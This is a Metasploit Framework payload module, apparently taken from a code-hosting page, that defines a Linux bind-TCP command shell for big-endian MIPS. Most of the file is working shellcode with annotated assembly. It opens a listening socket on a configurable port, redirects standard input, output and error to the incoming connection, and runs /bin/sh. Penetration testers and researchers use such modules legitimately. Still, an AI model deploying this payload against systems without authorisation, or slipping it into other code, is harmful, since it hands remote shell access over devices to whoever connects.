Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 232
10

11
  include Msf::Payload::Single
12
  include Msf::Sessions::CommandShellOptions
13

14
  def initialize(info = {})
15
    super(merge_info(info,
16
      'Name'          => 'Linux Command Shell, Bind TCP Inline',
17
      'Description'   => 'Listen for a connection and spawn a command shell',
18
      'Author'        =>
19
        [
20
          'scut',             # Original mips-irix-portshell shellcode
21
          'vaicebine',        # Original shellcode mod
22
          'Vlatko Kosturjak', # Metasploit module (mipsle)
23
          'juan vazquez'      # mipsbe conversion plus small fixes and optimizations
24
        ],
25
      'License'       => MSF_LICENSE,
26
      'Platform'      => 'linux',
27
      'Arch'          => ARCH_MIPSBE,
28
      'Handler'       => Msf::Handler::BindTcp,
29
      'Session'       => Msf::Sessions::CommandShellUnix,
30
      'Payload'       =>
31
        {
32
          'Offsets' => {} ,
33
          'Payload' => ''
34
        })
35
    )
36
  end
37

38
  def generate(_opts = {})
39
    if !datastore['LPORT']
40
      return super
41
    end
42

43
    port = Integer(datastore['LPORT'])
44
    port = [port].pack("n").unpack("cc");
45

46
    shellcode =
47
    # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
48
    "\x27\xbd\xff\xe0" + #     addiu   sp,sp,-32
49
    "\x24\x0e\xff\xfd" + #     li      t6,-3
50
    "\x01\xc0\x20\x27" + #     nor     a0,t6,zero
51
    "\x01\xc0\x28\x27" + #     nor     a1,t6,zero
52
    "\x28\x06\xff\xff" + #     slti    a2,zero,-1
53
    "\x24\x02\x10\x57" + #     li      v0,4183 ( __NR_socket )
54
    "\x01\x01\x01\x0c" + #     syscall
55

56
    # bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
57
    "\x30\x50\xff\xff" + #     andi    s0,v0,0xffff
58
    "\x24\x0e\xff\xef" + #     li      t6,-17                        ; t6: 0xffffffef
59
    "\x01\xc0\x70\x27" + #     nor     t6,t6,zero                    ; t6: 0x10 (16)
60
    "\x24\x0d\xff\xfd" + #     li      t5,-3                         ; t5: -3
61
    "\x01\xa0\x68\x27" + #     nor     t5,t5,zero                    ; t5: 0x2
62
    "\x01\xcd\x68\x04" + #     sllv    t5,t5,t6                      ; t5: 0x00020000
63
    "\x24\x0e" + port.pack("C2") +  #     li      t6,0xFFFF (port)   ; t6: 0x115c (4444 (default LPORT))
64
    "\x01\xae\x68\x25" + #     or      t5,t5,t6                      ; t5: 0x0002115c
65
    "\xaf\xad\xff\xe0" + #     sw      t5,-32(sp)
66
    "\xaf\xa0\xff\xe4" + #     sw      zero,-28(sp)
67
    "\xaf\xa0\xff\xe8" + #     sw      zero,-24(sp)
68
    "\xaf\xa0\xff\xec" + #     sw      zero,-20(sp)
69
    "\x02\x10\x20\x25" + #     or      a0,s0,s0
70
    "\x24\x0e\xff\xef" + #     li      t6,-17
71
    "\x01\xc0\x30\x27" + #     nor     a2,t6,zero
72
    "\x23\xa5\xff\xe0" + #     addi    a1,sp,-32
73
    "\x24\x02\x10\x49" + #     li      v0,4169 ( __NR_bind )A
74
    "\x01\x01\x01\x0c" + #     syscall
75

76
    # listen(3, 257) = 0
77
    "\x02\x10\x20\x25" + #     or      a0,s0,s0
78
    "\x24\x05\x01\x01" + #     li      a1,257
79
    "\x24\x02\x10\x4e" + #     li      v0,4174 ( __NR_listen )
80
    "\x01\x01\x01\x0c" + #     syscall
81

82
    # accept(3, 0, NULL) = 4
83
    "\x02\x10\x20\x25" + #     or      a0,s0,s0
84
    "\x28\x05\xff\xff" + #     slti    a1,zero,-1
85
    "\x28\x06\xff\xff" + #     slti    a2,zero,-1
86
    "\x24\x02\x10\x48" + #     li      v0,4168 ( __NR_accept )
87
    "\x01\x01\x01\x0c" + #     syscall
88

89
    # dup2(4, 2) = 2
90
    # dup2(4, 1) = 1
91
    # dup2(4, 0) = 0
92
    "\xaf\xa2\xff\xff" + #     sw v0,-1(sp) # socket
93
    "\x24\x11\xff\xfd" + #     li s1,-3
94
    "\x02\x20\x88\x27" + #     nor s1,s1,zero
95
    "\x8f\xa4\xff\xff" + #     lw a0,-1(sp)
96
    "\x02\x20\x28\x21" + #     move a1,s1 # dup2_loop
97
    "\x24\x02\x0f\xdf" + #     li v0,4063 ( __NR_dup2 )
98
    "\x01\x01\x01\x0c" + #     syscall 0x40404
99
    "\x24\x10\xff\xff" + #     li s0,-1
100
    "\x22\x31\xff\xff" + #     addi s1,s1,-1
101
    "\x16\x30\xff\xfa" + #     bne s1,s0 <dup2_loop>
102

103
    # execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
104
    "\x28\x06\xff\xff" + #     slti a2,zero,-1
105
    "\x3c\x0f\x2f\x2f" + #     lui t7,0x2f2f "//"
106
    "\x35\xef\x62\x69" + #     ori t7,t7,0x6269 "bi"
107
    "\xaf\xaf\xff\xec" + #     sw t7,-20(sp)
108
    "\x3c\x0e\x6e\x2f" + #     lui t6,0x6e2f "n/"
109
    "\x35\xce\x73\x68" + #     ori t6,t6,0x7368 "sh"
110
    "\xaf\xae\xff\xf0" + #     sw t6,-16(sp)
111
    "\xaf\xa0\xff\xf4" + #     sw zero,-12(sp)
112
    "\x27\xa4\xff\xec" + #     addiu a0,sp,-20
113
    "\xaf\xa4\xff\xf8" + #     sw a0,-8(sp)
114
    "\xaf\xa0\xff\xfc" + #     sw zero,-4(sp)
115
    "\x27\xa5\xff\xf8" + #     addiu a1,sp,-8
116
    "\x24\x02\x0f\xab" + #     li v0,4011 ( __NR_execve )
117
    "\x01\x01\x01\x0c"   #     syscall 0x40404
118

119
    return super + shellcode
120
  end
121
end
122

123